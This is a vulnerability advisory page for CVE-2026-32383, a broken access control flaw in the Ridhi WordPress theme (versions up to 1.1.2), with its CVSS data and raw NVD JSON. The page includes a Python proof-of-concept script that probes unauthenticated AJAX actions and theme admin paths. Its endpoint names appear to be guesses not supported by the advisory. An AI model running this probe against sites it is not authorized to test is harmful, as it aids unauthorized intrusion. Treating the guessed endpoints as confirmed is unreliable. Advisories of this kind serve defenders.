Security Vulnerability Report
中文
CVE-2026-32383 CVSS 5.3 MEDIUM

CVE-2026-32383

Published: 2026-03-13 19:54:54
Last Modified: 2026-04-29 10:17:03

Description

Missing Authorization vulnerability in raratheme Ridhi ridhi allows Exploiting Incorrectly Configured Access Control Security Levels.This issue affects Ridhi: from n/a through <= 1.1.2.

CVSS Details

CVSS Score
5.3
Severity
MEDIUM
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:L

Configurations (Affected Products)

No configuration data available.

Ridhi Theme <= 1.1.2

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
import requests # CVE-2026-32383 PoC - Ridhi Theme Broken Access Control # Target: WordPress site with Ridhi theme <= 1.1.2 target = "http://target-site.com" # PoC 1: Identify exposed AJAX actions ajax_actions = [ "ridhi_get_social_icons", "ridhi_get_footer_widget_data", "ridhi_customizer_preview", ] print("[*] Testing for exposed AJAX endpoints without authentication...") for action in ajax_actions: url = f"{target}/wp-admin/admin-ajax.php" data = {"action": action} try: resp = requests.post(url, data=data, timeout=10) if resp.status_code == 200 and "error" not in resp.text.lower(): print(f"[+] Vulnerable endpoint found: {action}") print(f"[+] Response: {resp.text[:200]}") except: pass # PoC 2: Direct access to protected theme options protected_paths = [ "/wp-admin/admin.php?page=ridhi-options", "/wp-content/themes/ridhi-inc/cores/admin-views/", ] print("\n[*] Testing protected path access without authentication...") for path in protected_paths: url = target + path try: resp = requests.get(url, timeout=10) if resp.status_code == 200: print(f"[+] Accessible protected path: {path}") except: pass

References

Raw JSON Data

JSON
{"cve": {"id": "CVE-2026-32383", "sourceIdentifier": "[email protected]", "published": "2026-03-13T19:54:53.500", "lastModified": "2026-04-29T10:17:03.430", "vulnStatus": "Deferred", "cveTags": [], "descriptions": [{"lang": "en", "value": "Missing Authorization vulnerability in raratheme Ridhi ridhi allows Exploiting Incorrectly Configured Access Control Security Levels.This issue affects Ridhi: from n/a through <= 1.1.2."}, {"lang": "es", "value": "Vulnerabilidad por falta de autorización en raratheme Ridhi ridhi permite la explotación de niveles de seguridad de control de acceso mal configurados. Este problema afecta a Ridhi: desde n/a hasta &lt;= 1.1.2."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:L", "baseScore": 5.3, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "NONE", "integrityImpact": "NONE", "availabilityImpact": "LOW"}, "exploitabilityScore": 3.9, "impactScore": 1.4}, {"source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:L/A:N", "baseScore": 5.3, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "NONE", "integrityImpact": "LOW", "availabilityImpact": "NONE"}, "exploitabilityScore": 3.9, "impactScore": 1.4}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-862"}]}], "references": [{"url": "https://patchstack.com/database/Wordpress/Theme/ridhi/vulnerability/wordpress-ridhi-theme-1-1-2-broken-access-control-vulnerability?_s_id=cve", "source": "[email protected]"}]}}